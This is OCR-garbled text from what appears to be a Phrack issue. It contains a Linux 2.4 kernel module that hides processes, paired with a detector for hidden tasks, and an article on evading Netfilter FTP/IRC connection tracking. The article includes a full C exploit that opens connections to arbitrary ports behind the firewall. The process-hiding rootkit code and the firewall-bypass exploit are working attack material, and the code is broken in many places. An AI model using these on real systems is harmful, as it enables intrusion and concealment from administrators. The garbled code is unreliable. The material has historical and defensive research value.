7 ine Efnet/Undernet #PHI 
* 
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define 


define MODULE 


include <] 
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__KERNI 


EL 


include <] 


include <] 


pid_t pid = 0 
struct task_struct *task = 0 ; 
unsigned char method = 


La 


int init_module ( ) { 
if ( pid) ¢{ 
task = 
printk 
, 
if (ta 
} 

} else if ( tas 
printk 
write_l 
if ( me 
} 
if ( me 
} 
if ( me 
} 
write_u 

} 

return 1 ; 

} 

MODULE_PARM ( pid , "i" 
MODULE_PARM_DESC ( pid 

MODULE_PARM ( task , "1 
MODULE_PARM DESC ( task 
MODULE_PARM ( method , 


inux/module.h> 
inux/kernel.h> 
inux/sched.h> 


Ox3 ; 


find_task_by_pid(pid) ; 


( "[HP] address of task struct for pid $i is Ox%p\n" , 


sk ) { 
write_lock_irg(&tasklist_lock) ; 
if ( method & Oxl ) { 


REMOVE_LINKS (task) ; 


if ( method & 0x2 ) { 
printk("[HP] unhashing pid\n") 
unhash_pid(task) ; 


} 

if ( method & 0x4 ) { 
printk("{HP] zerofing pid\n") ; 
task->pid == A 

} 


write_unlock_irq(&tasklist_lock) ; 


ke jo of 

( "[HP] unhideing task at addr 0x%x\n" , task ) 
ock_irg(&tasklist_lock) ; 

thod & Oxl ) { 

printk("[HP] setting process links\n") 
SET_LINKS (task) ; 


thod & 0x2 ) { 
printk("[HP] hashing pid\n") 
hash_pid(task) ; 


thod & 0x4 ) { 


printk ( "[HP] reverting 0 pid to %i\n" , task->tgid ) 


task-—>pid task->tgid ; 


nlock_irg(&tasklist_lock) ; 


\i ny 
"the pid to hide" ) ; 


WwW ) 
, "the address of the task struct to unhide" ) 


"b W ) y 


printk("({HP] removing process links\n") 


1’ 


la 


pid , 


’ 


task 


) 
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MODULE_PARM_DESC ( method , "a bitwise OR of the method to use 
pidhash , 0x4 - zerofy pid" ) ; 

MODULE_AUTHOR("ubra @ PHI Group") ; 

MODULE _| 

MODULE_LICENSE ("GPL") ; 


<=) 


<++> 
1% 


* 


+ + + + F + + F F F 


incl 


src/sht.c 


EXPORT_NO_SYMBOLS ; 


sht - search hidden tasks v1.0.0 


—~ 


syntax insmod sht.o 
coded in 2005 by ubra from PHI Group 
web - w3.phi.group.za.org 

mail - ubra_phi.group.za.org 

irc Efnet/Undernet #PHI 


define _ KERNEL 
define MODULE 


ude <linux/kernel.h> 


#incl 


ude <linux/module.h> 


incl 


ude <linux/sched.h> 


struct idta { 


unsigned 
unsigned 


struct idt { 


unsigned 
unsigned 
unsigned 
unsigned 
unsigned 


short size ; 
long addr __attribute__( (packed) ) 


short offl ; 
short seg ; 
char pad ; 

char flags ; 
short offh ; 


unsigned long get_idt_addr ( void ) { 
struct idta idta ; 


unsigned long get_int_addr ( unsigned int intp ) { 


asm ( "Ss 


idt $0" + "=m" (idta) ) ; 


return idta.addr ; 


struct idt idt ; 


checks tasks to be visible upon entering syscall 
demo code for hideing processes paper ) 


7 


, 


Oxl 


—- linked list 


EF DESCRIPTION("hp - hide pid v1.0.0 - hides a task with 3 possible methods") 


Ty 


Ox2 
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unsigned long idt_addr ; 


idt_addr = get_idt_addr() ; 


idt 


void hook_int 


*((struct idt *) 
return idt.offh << 16 | 


( unsigned int intp , 
struct idt idt 


1’ 


unsigned long idt_addr ; 


it 


( 


old_func 


) 


7’ 


idt_addr + intp) 
idt.offl 


*old_func = get_int_addr(intp) ; 
idt_addr = get_idt_addr() ; 


ia 


unsigned long new_func , 


Ty 


struct task_struct *task 


idt = *((struct idt *) idt_addr + intp) ; 
idt.offh = (unsigned short) (new_func >> 16 & OXxFFFF) ; 
idt.offl = (unsigned short) (new_func & OXxFFFF) ; 
*( (struct idt *) idt_addr + intp) = idt ; 
return ; 
} 
asmlinkage void check_task ( struct pt_regs *regs 
asmlinkage void stub_func ( void ) ; 
unsigned long new_handler = (unsigned long) 


unsigned 


void stub_handler ( void ) { 
asm(".globl stub_func \n" 
",align 4,0x90 Yn" 
"Stub_func \n" 
n pushal Via" 
" pushl $SeaX \n" 
7 movl $-8192 , %%eax \n" 
" andl Ssesp , %%eax \n" 
" pushl $Seax \n" 
movl -4(%S%esp) , %%eax Va 
" pushl S$SESp \n" 
" call *SO \n" 
n addl $12 , %%esp \n" 
Ww popal \n" 
Ww jmp KET \n" 
"m" (new_handler) , "m" (old_handler) 
} 
asmlinkage void check_task ( struct pt_regs *regs , 
struct task_struct *task_p = &init_task ; 
unsigned char on_ll = 0, on_ph=0 ; 
if ( ! task->mm ) 
return ; 
do { 
if ( task_p == task ) { 
ona = 
break ; 
} 
task_p = task_p->next_task ; 
} while ( task_p != &init_task ) ; 
if ( find_task_by_pid(task->pid) == task ) 


long old_handle 


ci; 


On phe Sl; 


&check_task ; 


) | 


struct task_struct *task 


) 


) 


unsigned long *old_func ) 


x 


{ 


{ 
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! on_ll | 

printk 

( $s / $s / Ss )\n" 

List" "NOT ON LINK 
d ? "pid is valid" 

return 


if ( 


, 


ED 
Ei 


7 


int sht_init ( void ) 
hook_int ( 128 
printk("[SHT] 


return 0 ; 


void sht_exit ( void ) 
hook_int ( 128 
printk("[SHT] 


return ; 


le init (sht_init) 
le_exit (sht_exit) 


<=> 


<++> src/sh.patch 

--- linux-2.4.30/kernel]l 
linux-2.4.30/kernel 
@@ -534,6 +534,25 @@ 


__schedule_tail 


} 


r { 


"PID IS INVALID" 


loaded —- monitoring tasks integrity\n") 


unloaded\n") 


tasmlinkage void phi_sht_check_task(struct task_struct *prev, 


struct task_struct *task_p 


6 09:43:44 2017 18 
| ! on_ph || ! task->pid ) 

( "{[SHT] task pid %i <%s> task addr 0x%x syscall %i - TASK IS HIDDEN 
task->pid , task->comm , task , regs->orig_eax , on_ll ? "on linked 
LIST" , on_ph ? "on pidhash list" "NOT ON PIDHASH LIST" , task->pi 


) 


1, 


{ 


, (unsigned long) &stub_func , é&0ld_handler ) ; 


’ 


{ 


, 


old_handler , NULL ) ; 


i 


la 


1’ 


MODULE_AUTHOR("ubra / PHI Group") 
MODULE_DESCRIPTION("sht —- search hidden tasks v1.0.0") ; 
MODULE_LICENSE ("GPL") ; 

EXPORT_NO_SYMBOLS ; 


l/sched_orig.c 2004-11-17 11:54:22.000000000 +0000 
L/sched.c 2005-07-08 13:29:16.000000000 +0000 


l(prev); 


struct task_struct *next) 


é&init_task; 


+ unsigned char on_ll = 0, on_ph = 0; 

+ do { 

+ if(task_p == prev) { 

ate on_ll = 1; 

+ break; 

ah } 

+ task_p = task_p->next_task ; 

+ } while(task_p != &init_task); 

+ if (find_task_by_pid(prev->pid) == prev) 

+ on_ph= 1; 

+ if (!on_ll || !on_ph || !prev->pid) 

+ printk("[SHT] task pid %i <%s> task addr O0x%x ( next task pid Si <%s> next 
task addr O0x%x ) - TASK IS HIDDEN ( %s / %s / %s )\n", prev->pid, prev->comm, prev, next-—>p 
id, next->comm, next, on_ll ? "on linked list" "NOT ON LINKED LIST", on_ph ? "on pidhash 
Last" "NOT ON PIDHASH LIST", prev->pid ? "pid is valid" "PID IS INVALID"); 


, 


es 


* 
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return; 


'schedule()’ is the scheduler function. It’s a very simple and nice 
* scheduler: it’s not perfect, but certainly works for most things. 
@@ -634,6 +653,13 @@ 


task_set_cpu(next, this_cpu); 
spin_unlock_irgq(&runqueue_lock) ; 


/* 
* check task*s structures before we do any scheduling decision 
* skip any kernel thread which might yeld false positives 
mf 
if (prev->mm) 
phi_sht_check_task (prev, next); 


if (unlikely(prev == next)) { 
/* We won’t go through the normal tail, so do this by hand */ 
prev->policy &= ~SCHED_YIELD; 
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| =[ Breaking through a Firewall using a forged FTP command ]=----- = 


| [ Soungjoo Han <kotkrye@hanmail.net> ] 
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i) 
| 


fey 
| 
H 


=—"| ntroduction 

FTP is a protocol that uses two connections. One of them is called a 
control connection and the other, a data connection. FTP commands and 
replies are exchanged across the control connection that lasts during an 
FTP session. On the other hand, a file(or a list of files) is sent across 
the data connection, which is newly established each time a file is 
transferred. 


Most firewalls do not usually allow any connections except FTP control 
connections to an FTP server port (TCP port 21 by default) for network 
security. However, as long as a file is transferred, they accept the data 
connection temporarily. To do this, a firewall tracks the control 
connection state and detects the command related to file transfer. This is 
called stateful inspection. 


I’ve created thr attack tricks that make a firewall allow an illegal 
connection by deceiving its connection tracking using a forged FTP command. 


I actually tested them in Netfilter/IPTables, which is a firewall 
installed by default in the Linux kernel 2.4 and 2.6. I confirmed the first 
trick worked in the Linux kernel 2.4.18 and the second one(a variant of the 
first one) worked well in the Linux 2.4.28(a recent version of the Linux 
kernel). 


This vulnerability was already reported to the Netfilter project team 
and they fixed it in the Linux kernel 2.6.11. 


--[ 2 - FTP, IRC and the stateful inspection of Netfilter 


First, let’s examine FTP, IRC(You will later know why IRC is mentioned) 
and the stateful inspection of Netfilter. If you are a master of them, you 
can skip this chapter. 


As stated before, FTP uses a control connection in order to exchange 
the commands and replies(, which are represented in ASCII) and, on the 
contrary, uses a data connection for file transfer. 


For instance, when you command "ls" or "get <a file name>" at FTP 
prompt, the FTP server(in active mode) actively initiates a data connection 
to a TCP port number(called a data port) on the FTP client, your host. The 
client, in advance, sends the data port number using a PORT command, one of 
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FTP commands. 
The format of a PORT command is as follows. 
PORT<space>h1,h2,h3,h4,pl1,p2<CRLF> 


Here the character string "h1,h2,h3,h4" means the dotted-decimal IP 
"h1l.h2.h3.h4" which belongs to the client. And the string "pl,p2" indicates 
a data port number(= pl * 256 + p2). Each field of the address and port 
number is in decimal number. A data port is dynamically assigned by a 
client. In addition, the commands and replies end with <CRLF> character 
sequence. 


Netfilter tracks an FTP control connection and gets the TCP sequence 
number and the data length of a packet containing an FTP command line 
(which ends with <LF>). And then it computes the sequence number of the 
next command packet based on the information. When a packet with the 
sequence number is arrived, Netfilter analyzes whether the data of the 
packet contains an FTP command. If the head of the data is the same as 
"PORT" and the data ends with <CRLF>, then Netfilter considers it as a 
valid PORT command (the actual codes are a bit more complicated) and 
extracts an IP address and a port number from it. Afterwards, Netfilter 
"expects" the server to actively initiate a data connection to the 
specified port number on the client. When the data connection request is 
actually arrived, it accepts the connection only while it is established. 
In the case of an incomplete command which is called a "partial" command, 
it is dropped for an accurate tracking. 


IRC (Internet Relay Chat) is an Internet chatting protocol. An IRC 
client can use a direct connection in order to speak with another client. 
When a client logs on the server, he/she connects to an IRC server 
TCP port 6667 by default). On the other hand, when the client wants to 
communicate with another, he/she establishes a direct connection to the 
peer. To do this, the client sends a message called a DCC CHAT command in 
advance. The command is analogous to an FTP PORT command. And Netfilter 
tracks IRC connections as well. It expects and accepts a direct chatting 
connection. 


a 


--[ 3 - Attack Scenario I 
=s=s'[. 3.) 5 First. Trick 
I have created a way to connect illegally to any TCP port on an FTP 


server that Netfilter protects by deceiving the connection-tracking module 
in the Linux kernel 2.4.18. 


In most cases, IPTables administrators make stateful packet filtering 
rule(s) in order to accept some Internet services such as IRC direct 
chatting and FTP file transfer. To do this, the administrators usually 
insert the following rule into the IPTables rule list. 


iptables -A FORWARD -m state --state ESTABLISHED, RELATED -—j ACC 


GJ 


PT 


Suppose that a malicious user who logged on the FTP server transmits a 
PORT command with TCP port number 6667(this is a default IRC server port 
number) on the external network and then attempts to download a file from 
the server. 


The FIP server actively initiates a data connection to the data port 
6667 on the attacker’s host. The firewall accepts this connection under the 
stateful packet filtering rule stated before. Once the connection is 
established, the connection-tracking module of the firewall(in the Linux 
kernel 2.4.18) has the security flaw to mistake this for an IRC connection. 
Thus the attacker’s host can pretend to be an IRC server. 


If the attacker downloads a file comprised of a string that has the 
same pattern as DCC CHAT command, the connection-tracking module will 
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misunderstand the contents of a packet for the file transfer as a DCC CHAT 
command. 


As a result, the firewall allows any host to connect to the TCP port 
number, which is specified in the fake DCC CHAT command, on the fake IRC 
client (i.e., the FTP server) according to the rule to accept the "related" 
connection for IRC. For this, the attacker has to upload the file befor 
the intrusion. 


In conclusion, the attacker is able to illegally connect to any TCP 
port on the FTP server. 


----[ 3.2 - First Trick Details 


To describe this in detail, let’s assume a network configuration is as 
follows. 


(a) A Netfilter/IPtables box protects an FTP server in a network. So users 
in the external network can connect only to FTP server port on the FTP 
server. Permitted users can log on the server and download/upload 

files. 


(b) Users in the protected network, including FTP server host, can connect 
only to IRC servers in the external network. 


(c) While one of the internet services stated in (a) and (b) is 
established, the secondary connections(e.g., FTP data connection) 
related to the service can be accepted temporarily. 


(d) Any other connections are blocked. 


To implement stateful inspection for IRC and FTP, the administrator 
loads the IP connection tracking modules called ip_conntrack into the 
firewall including ip_conntrack_ftp and ip_conntrack_irc that track FTP and 
IRC, respectively. Ipt_state must be also loaded. 


Under the circumstances, an attacker can easily create a program that 
logs on the FTP server and then makes the server actively initiate an FTP 
data connection to an arbitrary TCP port on his/her host. 


Suppose that he/she transmits a PORT command with data port 6667 (i.e., 
default IRC server port). 


An example is "PORT 192,168,100,100,26,11\r\n". 


The module ip_conntrack_ftp tracking this connection analyzes the PORT 
command and "expects" the FTP server to issue an active open to the 
specified port on the attacker’s host. 


Afterwards, the attacker sends an FTP command to download a file, 
"RETR <a file name>". The server tries to connect to port 6667 on the 
attacker’s host. Netfilter accepts the FTP data connection under the 
stateful packet filtering rule. 


Once the connection is established, the module ip_conntrack mistakes 
this for IRC connection. Ip_conntrack regards the FTP server as an IRC 
client and the attacker’s host as an IRC server. If the fake IRC client 
(i.e., the FTP server) transmits packets for the FTP data connection, the 
module ip_conntrack_irce will try to find a DCC protocol message from the 
packets. 


The attacker can make the FTP server send the fake DCC CHAT command 
using the following trick. Before this intrusion, the attacker uploads a 
file comprised of a string that has the same pattern as a DCC CHAT command 


in advance. 


To my knowledge, the form of a DCC CHAT command is as follows. 
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"\1DCC<a blank>CHAT<a blank>t<a blank><The decimal IP address of the IRC 
client><blanks><The TCP port number of the IRC client>\1\n" 


An example is "\1DCC CHAT t 3232236548 8000\1\n" 


In this case, Netfilter allows any host to do an active open to the TCP 
port number on the IRC client specified in the line. The attacker can, of 
course, arbitrarily specify the TCP port number in the fake DCC CHAT 
command message. 


If a packet of this type is passed through the firewall, the module 
ip_conntrack_irc mistakes this message for a DCC CHAT command and "expects" 
any host to issue an active open to the specified TCP port number on the 
FTP server for a direct chatting. 


As a result, Netfilter allows the attacker to connect to the port 
number on the FTP server according to the stateful inspection rule. 


After all, the attacker can illegally connect to any TCP port on the 
FTP server using this trick. 


--[{ 4 - Attack Scenario II - Non-standard command line 
----[ 4.1. Second Trick Details 


Netfilter in the Linux kernel 2.4.20(and the later versions) is so 
fixed that a secondary connection(e.g., an FTP data connection) accepted by 
a primary connection is not mistaken for that of any other protocol. Thus 
the packet contents of an FTP data connection are not parsed any more by 
the IRC connection-tracking module. 


However, I’ve created a way to connect illegally to any TCP port on an 
FTP server that Netfilter protects by dodging connection tracking using a 
nonstandard FTP command. As stated before, I confirmed that it worked in 
the Linux kernel 2.4.28. 


Under the circumstances stated in the previous chapter, a malicious 
user in the external network can easily create a program that logs on the 
FTP server and transmits a nonstandard FTP command line. 


For instance, an attacker can transmit a PORT command without the 
character <CR> in the end of the line. The command line has only <LF> in 
the end. 


An example is "PORT 192,168,100,100,26,11\n". 


On the contrary, a standard FTP command has <CRLF> sequence to denot 
the end of a line. 


If the module ip_conntrack_ftp receives a nonstandard PORT command of 
this type, it first detects a command and finds the character <CR> for the 
parsing. Because it cannot be found, ip_conntrack_ftp regards this as a 
"partial" command and drops the packet. 


Just before this action, ip_conntrack_ftp anticipated the sequenc 
number of a packet that contains the next FTP command line and updated the 
associated information. This number is calculated based on the TCP sequence 
number and the data length of the "partial" PORT command packet. 


However, a TCP client, afterwards, usually retransmits the identical 
PORT command packet since the corresponding reply is not arrived at the 
client. In this case, ip_conntrack_ftp does NOT consider this retransmitted 
packet as an FTP command because its sequence number is different from that 
of the next FTP command anticipated. From the point of view of 
ip_conntrack_ftp, the packet has a "wrong" sequence number position. 
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The module ip_conntrack_ftp just accepts the packet without analyzing 
this command. The FTP server can eventually receive the retransmitted 
packet from the attacker. 


Although ip_conntrack_ftp regards this "partial" command as INVALID, 
some FTP servers such as wu-FTP and IIS FTP conversely consider this PORT 
command without <CR> as VALID. In conclusion, the firewall, in this case, 
fails to "expect" the FTP data connection. 


And when the attacker sends a RETR command to download a file from the 
server, the server initiates to connect to the TCP port number, specified 
in the partial PORT command, on the attacker’s host. 


Suppose that the TCP port number is 6667(IRC server port), the firewall 
accepts this connection under the stateless packet filtering rule that 
allows IRC connections instead of the stateful filtering rule. So the IP 
connection-tracking module mistakes the connection for IRC. 


The next steps of the attack are the same as those of the trick stated 
in the previous chapter. 


In conclusion, the attacker is able to illegally connect to any TCP 
port on the FTP server that the Netfilter firewall box protects. 


*[supplement] There is a more refined method to dodge the 
connection-tracking of Netfilter. It uses default data port. On condition 
that data port is not specified by a PORT command and a data connection is 
required to be established, an FTP server does an active open from port 20 
on the server to the same (a client’s) port number that is being used for 
the control connection. 


To do this, the client has to listen on the local port in advance. In 
addition, he/she must bind the local port to 6667(IRCD) and set the socket 
option "SO_REUSEADDR" in order to reuse this port. 


Because a PORT command never passes through a Netfilter box, the 
firewall can’t anticipate the data connection. I confirmed that it worked 
in the Linux kernel 2.4.20. 


** A demonstration tool and an example of this attack are described in 
APPENDIX I and APPENDIX II, respectively. 


--[ 5 - Attack Scenario III - ’echo’ feature of FIP reply 
----[ 5.1 - Passive FTP: background information 
An FTP server is able to do a passive open for a data connection as 


well. This is called passive FTP. On the contrary, FTP that does an active 
open is called active FTP. 


Just before file transfer in the passive mode, the client sends a PASV 
command and the server replies the corresponding message with a data port 
number to the client. An example is as follows. 


—-> PASV\r\n 
<- 227 Entering Passive Mode (192,168,20,20,42,125)\r\n 


Like a PORT command, the IP address and port number are separated by 
commas. Meanwhile, when you enter a user name, the following command and 
reply are exchanged. 


-> USER <a user name>\r\n 
<- 331 Password required for <the user name>.\r\n 


----[ 5.2 - Third Trick Details 
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Right after a user creates a connection to an FTP server, the server 
usually requires a user name. When the client enters a login name at FTP 
prompt, a USER command is sent and then the same character sequence as the 
user name, which is a part of the corresponding reply, is returned like 
echo. For example, a user enters the sting "Alice Lee" as a login name at 
FTP prompt, the following command line is sent across the control 
connection. 


-—> USER Alice Lee\r\n 


The FIP server usually replies to it as follows. 


<- 331 Password required for Alice Lee.\r\n 


("Alice Lee" is echoed.) 
Blanks are able to be included in a user name. 
A malicious user can insert a arbitrary pattern in the name. For 


instance, when the same pattern as the reply for passive FTP is inserted in 
it, a part of the reply is arrived like a reply related to passive FTP. 


-> USER 227 Entering Passive Mode (192,168,20,29,42,125)\r\n 
<- 331 Password required for 227 Entering Passive Mode 
(192,168,20,29,42,125).\r\n 


Does a firewall confuse it with a ‘real’ passive FTP reply? Maybe most 
firewalls are not deceived by the trick because the pattern is in the 
middle of the reply line. 


However, suppose that the TCP window size field of the connection is 
properly adjusted by the attacker when the connection is established, then 
the contents can be divided into two like two separate replies. 


(A) ----- >USER XXXXXXXXxX227 Entering Passive Mode 
(192,168,20,29,42,125)\r\n 

(B) <----- 331 Password required for xxxxxXxXxXxXxX 

(EG) =e == >ACK (with no data) 

(D) <----- 227 Entering Passive Mode (192,168,20,20,42,125).\r\n 

(where the characters "xxxxx..." are inserted garbage used to adjust the 


data length.) 


I actually tested it for Netfilter/IPTables. I confirmed that Netfilter 
does not mistake the line (D) for a passive FTP reply at all. 


The reason is as follows. 


(B) is not a complete command line that ends with <LF>. Netfilter, 
thus, never considers (D), the next packet data of (B) as the next reply. 
As a result, the firewall doesn’t try to parse (D). 


But, if there were a careless connection-tracking firewall, the attack 
would work. 


In the case, the careless firewall would expect the client to do an 
active open to the TCP port number, which is specified in the fake reply, 
on the FTP server. When the attacker initiates a connection to the target 
port on the server, the firewall eventually accepts the illegal connection. 


--[ 6 —- APPENDIX I. A demonstration tool of the second trick 


I wrote an exploiting program using C language. I used the following 
compilation command. 


/>gcc -Wall -o fake_irce fake_irc.c 
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The source code is as follows. 
/* 


USAGE : ./fake_irc <an FTP server IP> <a target port> 
<a user name> <a password> <a file name to be downloaded> 


— <an FTP server IP> : An FTP server IP that is a victim 
-— <a target port> : the target TCP port on the FTP server to which an 
attacker wants to connect 


—- <a user name> : a user name used to log on the FTP server 

— <a password> : a password used to log on the FTP server 

-— <a file name to be downloaded> : a file name to be downloaded from the 
FTP server 

ay 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <string.h> 
nclude <unistd.h> 
nclude <sys/socket.h> 
nclude <arpa/inet.h> 


define BUF_SIZE 2048 

define DATA _BUF_SZ 65536 
define IRC_SERVER_PORT 6667 
define FTP_SERVER_PORT 21 


static void usage (void) 


printf ("USAGE : ./fake_irc " 
"<an FTP server IP> <a target port> <a user name> " 
"<a password> <a file name to be downloaded>\n") ; 


return; 


} 


void send_cmd(int fd, char *msg) 


{ 
if(send(fd, msg, strlen(msg), 0) < 0) { 
perror ("send"); 


exit (0); 
} 


printf ("--->%s\n", msg); 


} 


void get_reply(int fd) 

{ 

char read_buffer[BUF_SIZE]; 
int size; 


//get the FTP server messag 
if( (size = recv(fd, read_buffer, BUF_SIZE, 0)) < 0) f{ 
perror ("recv"); 


exit (0); 
} 
read_buffer[size] = ’\0’; 
printf ("<---%s\n", read_buffer) ; 


} 


void cmd_reply_xchg(int fd, char *msg) 
{ 

send_cmd(fd, msg); 

get_reply (fd); 
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/* 
argv [0] a program name 

argv[1] an FTP server IP 

argv [2] a target port on the FTP server host 
argv [3] a user name 

argv[4] a password 

argv [5] a file name to be downloaded 

oy) 


int main(int argc, char **argv) 


{ 


int. fd, fd2;. £fd3:,.-fd4; 

struct sockaddr_in serv_addr, serv_addr2; 
char send_buffer[BUF_SIZE]; 

char *ftp_server_ip, *user_id, *pwd, *down_file; 
unsigned short target_port; 

char data_buf [DATA_BUF_SZ]; 

struct sockaddr_in sa_cli; 

socklen_t client_len; 

unsigned int on = 1; 

unsigned char addr8[4]; 

int datasize; 

if(arge != 6) { 

usage (); 


return -1; 


} 


ftp_server_ip = argv[1]; 
target_port = atoi(argv[2]); 
user_id = argv[3]; 

pwd = argv[4]; 

down_file = argv[5]; 


5 


if((fd = socket (AF_INET, SOCK_STREAM, 0)) <0) { 
perror ("socket"); 
return -1; 


} 


bzero(&serv_addr, sizeof(struct sockaddr_in)); 
serv_addr.sin_family = AF_INET; 
serv_addr.sin_port = htons (FTP_SERVER_PORT) ; 

serv_addr.sin_addr.s_addr = inet_addr(ftp_server_ip); 


//connect to the FTP server 

if (connect (fd, (struct sockaddr *) &serv_addr, sizeof(struct sockaddr))) {f 
perror ("connect") ; 

return -1; 


} 


//get the FTP server messag 
get_reply (fd); 


//exchange a USER command and the reply 
sprintf (send_buffer, "USER %s\r\n", user_id); 
cmd_reply_xchg(fd, send_buffer); 


//exchange a PASS command and the reply 
sprintf (send_buffer, "PASS %s\r\n", pwd); 
cmd_reply_xchg(fd, send_buffer); 


//exchange a SYST command and the reply 
sprintf (send_buffer, "SYST\r\n"); 
cmd_reply_xchg(fd, send_buffer); 


sleep(1); 
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//write a PORT command 
datasize = sizeof (serv_addr); 


if(getsockname(fd, (struct sockaddr *)&serv_addr, é&datasize) < 0) { 
perror ("getsockname") ; 
return -1; 


} 
memcpy (addr8, &serv_addr.sin_addr.s_addr, sizeof (addr8)); 
sprintf (send_buffer, "PORT %hhu, Shhu, Shhu, Shhu, Shhu, hhu\n", 


addr8[0], addr8[1], addr8[2], addr8[3], 
IRC_SERVER_PORT/256, IRC_SERVER_PORT % 256); 


cmd_reply_xchg(fd, send_buffer); 


//Be a server for an active FTP data connection 
if((fd2 = socket (AF_INET, SOCK_STREAM, 0)) <0) f 
perror ("socket"); 

return -1; 


} 


if (setsockopt (fd2, SOL_SOCKET, SO_REUSEADDR, &o0n, sizeof(on)) < 0) { 
perror("setsockopt"); 
return -1; 


} 


bzero(&serv_addr, sizeof(struct sockaddr_in)); 
serv_addr.sin_family = AF_INET; 
serv_addr.sin_port = htons (IRC_SERVER_PORT) ; 
serv_addr.sin_addr.s_addr = INADDR_ANY; 


if( bind(fd2, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0 ) 
perror ("bind"); 
return -1; 


} 


if( listen(fd2, SOMAXCONN) < 0 ) { 
perror ("listen"); 
return -1; 


} 


//send a RETR command after calling listen() 
sprintf (send_buffer, "RETR %s\r\n", down_file); 
cmd_reply_xchg(fd, send_buffer); 


//accept the active FTP data connection request 
client_len = sizeof(sa_cli); 
bzero(&sa_cli, client_len); 


fd3 = accept (fd2, (struct sockaddr*) &sa_cli, &client_len); 


if( fd3 < 0) { 
perror ("accept"); 
return -1; 


} 


//get the fake DCC command 
bzero(data_buf, DATA_BUF_SZ); 


if( recv(fd3, data_buf, DATA_BUF_SZ, 0) < 0) { 
perror("recv"); 
return -1; 
} 
puts (data_buf); 
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///Start of the attack 

if ((fd4= socket (AF_INET, SOCK_STREAM, 0)) <0) { 
perror ("socket"); 

return -1; 


} 


bzero(&serv_addr2, sizeof(struct sockaddr_jin)); 
serv_addr2.sin_family = AF_INET; 

serv_addr2.sin_port = htons(target_port ); 
serv_addr2.sin_addr.s_addr = inet_addr(ftp_server_ip); 


if (connect (fd4, (struct sockaddr *)&serv_addr2, sizeof(struct sockaddr) ) ) 
{ 

perror ("connect"); 

return -1; 

}else 

printf ("\nConnected to the target port! !\n"); 


//Here, communicate with the target port 
sleep (3); 


close (fd4);//close the attack connection 
/////////////The end of the attack. 


close (fd3);//close the FTP data connection 
//get the reply of FTP data transfer completion 
get_reply (fd); 

sleep(1); 


close(fd);//close the FTP control connection 
close (fd2); 


return 0; 


}/*The end*/ 


--[ 7 — APPENDIX II. A demonstration example of the second attack trick 


The followings are the circumstances in which I tested it actually. 


The below symbol "[]" stands for a computer box. 


An attacker’s host]----- [A firewall]----- [An FTP server] 
(The network interfaces, ethl and eth2 of the firewall are directly linked 
to the attacker’s host and server, respectively.) 


As shown in the above figure, packets being transmitted between the FTP 
client (i.e., the attacker) and the FTP server pass through the linux box 
with IPTables in the Linux kernel 2.4.28. 


The IP addresses assigned in each box are as follows. 


The attacker’s host : 192.168.3.3 

ethl port in the Linux box : 192.168.3.1 
The FIP server : 192.168.4.4 

eth2 port in the Linux box : 192.168.4.1 


Ga tee sees 


a 
b 
c 
d 


Sat Te ey Re 


A TCP server is listening on the FTP server’s host address and port 
8000. The server on port 8000 is protected by IPTables. The attacker tried 
to connect illegally to port 8000 on the FTP server in this demonstration. 


The associated records during this attack are written in the following 
order. 
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(1) The system configurations in the firewall, including the ruleset of 
IPTables 

(2) Tcpdump outputs on ethl port of the firewall 

(3) Tepdump outputs on eth2 port of the firewall 


(4) The file /proc/net/ip_conntrack data with the change of times. 
the information on connections being tracked. 

(5) DEBUGP(), printk messages for debug in the source 

files (ip_conntrack_core.c, 

For the detailed messages, 

the files. 


Since some characters of th 
deleted. I am sorry for this. 


messages are Korean, 


It shows 


ip_conntrack_ftp.c and ip_conntrack_irc.c). 
I activated the macro function DEBUGP () 


in 


they have been 


(1) The system configurations in the firewall 


[root@hans root]# uname -a 

Linux hans 2.4.28 #2 2004. 12. 25. () 16:02:51 KST i686 unknown 
[root@hans root]# lsmod 

Module Size Used by Not tainted 

ip_conntrack_irc 5216 O (unused) 

ip_conntrack_ftp 6304 O (unused) 

ipt_state 1056 1 (autoclean) 

ip_conntrack 40312 2 (autoclean) [ip_conntrack_irc 
ip_conntrack_ftp 

ipt_state] 

iptable_filter 2432 1 (autoclean) 

ip_tables 16992 2 [ipt_state iptable_ filter] 

ext3 64032 3. (autoclean) 

jbd 44800 3 (autoclean) [ext3] 

usbcore 48576 O (unused) 

[root@hans root]# iptables -L 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 

Chain FORWARD (policy DROP) 

target prot opt source destination 

ACCEP tep == 92.768 .323 192.168.4.4 tcp dpt:ftp 
ACCEPT tcp - anywhere anywhere tcp dpt:auth 
ACCEP tcp - 192.168.4.4 192 .168..3%3 tcp dpt:ircd 
ACCEP all - anywhere anywhere state 
RELATED, ESTABL 

ISHED 

Chain OUTPUT (policy ACCEPT) 

target prot opt source destination 

[root@hans root]# route -n 

Kernel IP routing table 

Destination Gateway Genmask Flags Metric Ref Use 
Iface 

192.168.4.0 0.0.0.0 2993250 %295..0 U 0 0 0 
eth2 

192.168.3.0 0.0.0.0 255.255.255.0 U 0 0 0 
ethl 

192.168.150.0 0.0.0.0 2992259329520 U 0 0 0 
etho 

127.0.0.0 0.0.0.0 299:.0.0'.0 U 0 0 0 lo 
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(2) Tcpdump outputs on ethl port of the firewall 


You can see that the "partial" PORT commands were transmitted and an 
illegal connection to port 8000 was established. 


tcpdump -nn -i ethl -s 0 -X 


[ phrack staff: Output removed. Do it on your own. ] 


(3) Tepdump outputs on eth2 port of the firewall 


Only one PORT command w/o <CR> is shown on eth2 port since the first one 
was dropped. 


tcpdump -nn -i eth2 -s 0 -X 


[ phrack staff: Output removed. Get skilled. Do it yourself! ] 


(4) The file /proc/net/ip_conntrack data with change of times. 


The file /proc/net/ip_conntrack shows the information on connections being 
tracked. To that end, I executed the following shell command. 


/>watch -n 1 "data >> /tmp/ipconn.txt;cat /proc/net/ip_conntrack >> 
/tmp/ipconn.txt" 


Note : Connections that are not associated with this test are seen from 
time to time. I am sorry for this. 


[ phrack staff: Output removed. Use the force luke! ] 


(5) dmesg outputs 


->The following paragraph in the message shows that the first PORT command 
w/o <CR> was regarded as "partial" and thus dropped. 


Dec 31 15:03:40 hans kernel: find_pattern ‘PORT’: dlen = 23 

Dec 31 15:03:40 hans kernel: Pattern matches! 

Dec 31 15:03:40 hans kernel: Skipped up to * ’! 

Dec 31 15:03:40 hans kernel: Char 17 (got 5 nums) ‘10’ unexpected 

Dec 31 15:03:40 hans kernel: conntrack_ftp: partial PORT 1273167371+23 


->The following paragraph shows that the second invalid PORT command w/o 
